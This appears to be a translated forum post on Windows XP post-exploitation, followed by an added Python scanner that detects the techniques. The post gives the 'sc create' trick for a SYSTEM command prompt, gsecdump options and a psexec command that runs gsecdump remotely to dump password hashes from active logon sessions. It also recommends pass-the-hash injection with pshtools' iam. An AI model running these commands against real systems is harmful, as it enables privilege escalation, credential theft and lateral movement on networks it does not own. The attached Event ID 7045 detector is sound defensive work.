To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to import the HASH information just grabbed with gsecdump into the local lsass process, to carry out a hash injection attack. The foreigners really are good; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to be cracked at all; it is just a matter of using the tool. As the original article puts it well: whether the password is set to 4 characters or 127, once you have the hash, it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
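The defender's side of the two techniques shown in this post, as an added example that is not part of the post or of the truesec write-up: a small scanner over constructed Windows System-log records in the shape of Event ID 7045 ("A service was installed in the system"), flagging a service whose image is cmd.exe (the sc create trick above) and the PSEXESVC service that PsExec installs when it runs a remote command such as the -s call above. The records, service names other than PSEXESVC, paths and accounts are constructed for the example; only the three message fields parsed are taken from the real 7045 layout.

```python
import re

def event(name, path, account="LocalSystem", event_id=7045):
    """Build a constructed record in the shape of a 7045 message (every value is made up)."""
    return {"EventID": event_id, "Message": ("A service was installed in the system.\r\n"
            f"Service Name: {name}\r\nService File Name: {path}\r\nService Account: {account}")}

SAMPLE_EVENTS = [
    event("shellcmdline", '"C:\\WINDOWS\\system32\\cmd.exe /K start"'),
    event("PSEXESVC", "%SystemRoot%\\PSEXESVC.exe"),
    event("BackupAgent", '"C:\\Program Files\\Backup\\agent.exe"', "NT AUTHORITY\\NetworkService"),
    {"EventID": 7036, "Message": "The BackupAgent service entered the running state."},
]

FIELD_RE = re.compile(r"^(Service Name|Service File Name|Service Account):\s*(.*?)\s*$", re.M)
SHELL_BINARIES = {"cmd.exe", "powershell.exe"}  # an interactive shell makes no sense as a service image

def parse_7045(message):
    """Pull the 'Field: value' lines out of a 7045 message body."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(message)}

def image_name(file_name):
    """First *.exe token of the service file name, lower-cased (quotes, path and arguments dropped)."""
    m = re.search(r'([^\\/"]+?\.exe)', file_name, re.I)
    return m.group(1).lower() if m else ""

def classify(event):
    """Reasons a record matches the techniques in the post; [] when benign or not a 7045."""
    if event.get("EventID") != 7045:
        return []
    fields = parse_7045(event["Message"])
    exe = image_name(fields.get("Service File Name", ""))
    reasons = []
    if exe in SHELL_BINARIES:
        reasons.append(f"service image is a command shell ({exe}) running as {fields.get('Service Account', '?')}")
    if fields.get("Service Name", "").lower() == "psexesvc" or exe == "psexesvc.exe":
        reasons.append("PsExec service (PSEXESVC) installed (remote execution, e.g. psexec -s)")
    return reasons

def scan(events):
    """Service name -> findings for every record that triggered."""
    return {parse_7045(ev["Message"])["Service Name"]: r for ev in events if (r := classify(ev))}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS).items():
        print(f"[!] {name}: " + "; ".join(reasons))
```

Against the constructed records the scan reports shellcmdline and PSEXESVC and stays silent on BackupAgent and the unrelated 7036 event.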